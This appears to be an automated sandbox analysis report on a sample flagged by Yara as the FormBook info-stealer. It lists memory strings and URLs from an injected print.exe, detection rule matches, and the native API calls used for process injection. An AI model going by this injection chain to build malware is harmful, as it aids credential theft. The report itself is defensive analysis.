Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/icon?family=Material
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.hover.com/home?source=parked
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: print.exe, 00000010.00000002.4494834964.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: print.exe, 00000010.00000002.4494834964.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: print.exe, 00000010.00000002.4494834964.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: print.exe, 00000010.00000002.4494834964.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: print.exe, 00000010.00000002.4494834964.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: print.exe, 00000010.00000002.4494834964.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: print.exe, 00000010.00000003.2441582614.0000000007123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://performance.radar.cloudflare.com/beacon.js
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://s3-us-west-2.amazonaws.com/listingzen/agents/agent4/450/agent1482359813.jpg
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://s3-us-west-2.amazonaws.com/listingzen/vendors/vendor2/450/vendor1472074370.jpg
Source: print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://sparrow.cloudflare.com/api/v1/event
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://twitter.com/hover
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://uk.pinterest.com/listingzen
Source: print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing/
Source: print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/login?utm_source=error_100x
Source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/?source=parked
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/about?source=parked
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domains/results
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/email?source=parked
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/privacy?source=parked
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew?source=parked
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tools?source=parked
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tos?source=parked
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/transfer_in?source=parked
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/hover_domains
Source: print.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.listingzen.com/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large strings

Source: UnmxRI.exe, frmMain.cs	Long String: Length: 185344
Source: tehuvFgZlLZK.exe.0.dr, frmMain.cs	Long String: Length: 185344

Contains functionality to call native functions

Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040B853 NtAllocateVirtualMemory,	9_2_0040B853
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040A943 NtCreateSection,	9_2_0040A943
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040A103 NtGetContextThread,	9_2_0040A103
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040AB63 NtMapViewOfSection,	9_2_0040AB63
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040A313 NtSetContextThread,	9_2_0040A313
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040B433 NtDelayExecution,	9_2_0040B433
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040A523 NtResumeThread,	9_2_0040A523
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040AD93 NtCreateFile,	9_2_0040AD93
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00428603 NtClose,	9_2_00428603
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00409EF3 NtSuspendThread,	9_2_00409EF3
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040AFC3 NtReadFile,	9_2_0040AFC3
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2B60 NtClose,LdrInitializeThunk,	9_2_018E2B60
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_018E2DF0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_018E2C70
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E35C0 NtCreateMutant,LdrInitializeThunk,	9_2_018E35C0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E4340 NtSetContextThread,	9_2_018E4340
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E4650 NtSuspendThread,	9_2_018E4650
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2B80 NtQueryInformationFile,	9_2_018E2B80
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2BA0 NtEnumerateValueKey,	9_2_018E2BA0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2BE0 NtQueryValueKey,	9_2_018E2BE0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2BF0 NtAllocateVirtualMemory,	9_2_018E2BF0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2AB0 NtWaitForSingleObject,	9_2_018E2AB0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2AD0 NtReadFile,	9_2_018E2AD0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2AF0 NtWriteFile,	9_2_018E2AF0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2DB0 NtEnumerateKey,	9_2_018E2DB0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2DD0 NtDelayExecution,	9_2_018E2DD0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2D00 NtSetInformationFile,	9_2_018E2D00
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2D10 NtMapViewOfSection,	9_2_018E2D10
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2D30 NtUnmapViewOfSection,	9_2_018E2D30
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2CA0 NtQueryInformationToken,	9_2_018E2CA0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2CC0 NtQueryVirtualMemory,	9_2_018E2CC0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2CF0 NtOpenProcess,	9_2_018E2CF0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2C00 NtQueryInformationProcess,	9_2_018E2C00
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2C60 NtCreateKey,	9_2_018E2C60
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2F90 NtProtectVirtualMemory,	9_2_018E2F90
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2FA0 NtQuerySection,	9_2_018E2FA0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2FB0 NtResumeThread,	9_2_018E2FB0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2FE0 NtCreateFile,	9_2_018E2FE0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2F30 NtCreateSection,	9_2_018E2F30
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2F60 NtCreateProcessEx,	9_2_018E2F60
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2E80 NtReadVirtualMemory,	9_2_018E2E80
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2EA0 NtAdjustPrivilegesToken,	9_2_018E2EA0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2EE0 NtQueueApcThread,	9_2_018E2EE0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E2E30 NtWriteVirtualMemory,	9_2_018E2E30
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E3090 NtSetValueKey,	9_2_018E3090
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E3010 NtOpenDirectoryObject,	9_2_018E3010
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E39B0 NtGetContextThread,	9_2_018E39B0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E3D10 NtOpenProcessToken,	9_2_018E3D10
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E3D70 NtOpenThread,	9_2_018E3D70
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E74340 NtSetContextThread,LdrInitializeThunk,	16_2_02E74340
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E74650 NtSuspendThread,LdrInitializeThunk,	16_2_02E74650
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72AF0 NtWriteFile,LdrInitializeThunk,	16_2_02E72AF0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72AD0 NtReadFile,LdrInitializeThunk,	16_2_02E72AD0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72BE0 NtQueryValueKey,LdrInitializeThunk,	16_2_02E72BE0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	16_2_02E72BF0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72BA0 NtEnumerateValueKey,LdrInitializeThunk,	16_2_02E72BA0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72B60 NtClose,LdrInitializeThunk,	16_2_02E72B60
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72EE0 NtQueueApcThread,LdrInitializeThunk,	16_2_02E72EE0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72E80 NtReadVirtualMemory,LdrInitializeThunk,	16_2_02E72E80
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72FE0 NtCreateFile,LdrInitializeThunk,	16_2_02E72FE0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72FB0 NtResumeThread,LdrInitializeThunk,	16_2_02E72FB0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72F30 NtCreateSection,LdrInitializeThunk,	16_2_02E72F30
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72CA0 NtQueryInformationToken,LdrInitializeThunk,	16_2_02E72CA0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72C60 NtCreateKey,LdrInitializeThunk,	16_2_02E72C60
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72C70 NtFreeVirtualMemory,LdrInitializeThunk,	16_2_02E72C70
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72DF0 NtQuerySystemInformation,LdrInitializeThunk,	16_2_02E72DF0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72DD0 NtDelayExecution,LdrInitializeThunk,	16_2_02E72DD0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72D30 NtUnmapViewOfSection,LdrInitializeThunk,	16_2_02E72D30
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72D10 NtMapViewOfSection,LdrInitializeThunk,	16_2_02E72D10
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E735C0 NtCreateMutant,LdrInitializeThunk,	16_2_02E735C0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E739B0 NtGetContextThread,LdrInitializeThunk,	16_2_02E739B0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72AB0 NtWaitForSingleObject,	16_2_02E72AB0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72B80 NtQueryInformationFile,	16_2_02E72B80
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72EA0 NtAdjustPrivilegesToken,	16_2_02E72EA0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72E30 NtWriteVirtualMemory,	16_2_02E72E30
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72FA0 NtQuerySection,	16_2_02E72FA0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72F90 NtProtectVirtualMemory,	16_2_02E72F90
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72F60 NtCreateProcessEx,	16_2_02E72F60
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72CF0 NtOpenProcess,	16_2_02E72CF0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72CC0 NtQueryVirtualMemory,	16_2_02E72CC0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72C00 NtQueryInformationProcess,	16_2_02E72C00
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72DB0 NtEnumerateKey,	16_2_02E72DB0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E72D00 NtSetInformationFile,	16_2_02E72D00
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E73090 NtSetValueKey,	16_2_02E73090
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E73010 NtOpenDirectoryObject,	16_2_02E73010
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E73D70 NtOpenThread,	16_2_02E73D70
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E73D10 NtOpenProcessToken,	16_2_02E73D10
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004C4D70 NtCreateFile,	16_2_004C4D70
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004C4EA0 NtReadFile,	16_2_004C4EA0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004C4F60 NtDeleteFile,	16_2_004C4F60
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004C4FE0 NtClose,	16_2_004C4FE0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004C5110 NtAllocateVirtualMemory,	16_2_004C5110

Detected potential crypto function

Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_0236D55C	0_2_0236D55C
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A67860	0_2_06A67860
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A6B7A0	0_2_06A6B7A0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A675B8	0_2_06A675B8
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A6B5E0	0_2_06A6B5E0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A675C8	0_2_06A675C8
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A6001B	0_2_06A6001B
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A60040	0_2_06A60040
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A6A840	0_2_06A6A840
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A67852	0_2_06A67852
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_0A6C0D20	0_2_0A6C0D20
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_004019BA	9_2_004019BA
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00403006	9_2_00403006
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_004028D0	9_2_004028D0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_004100E3	9_2_004100E3
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0042A943	9_2_0042A943
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040294C	9_2_0040294C
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00401160	9_2_00401160
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00410303	9_2_00410303
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00403305	9_2_00403305
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00403310	9_2_00403310
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040E383	9_2_0040E383
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00402BB0	9_2_00402BB0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_004165D0	9_2_004165D0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_004165D3	9_2_004165D3
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00401E20	9_2_00401E20
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_004026C8	9_2_004026C8
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_004026D0	9_2_004026D0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00402FAE	9_2_00402FAE
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00402FB0	9_2_00402FB0
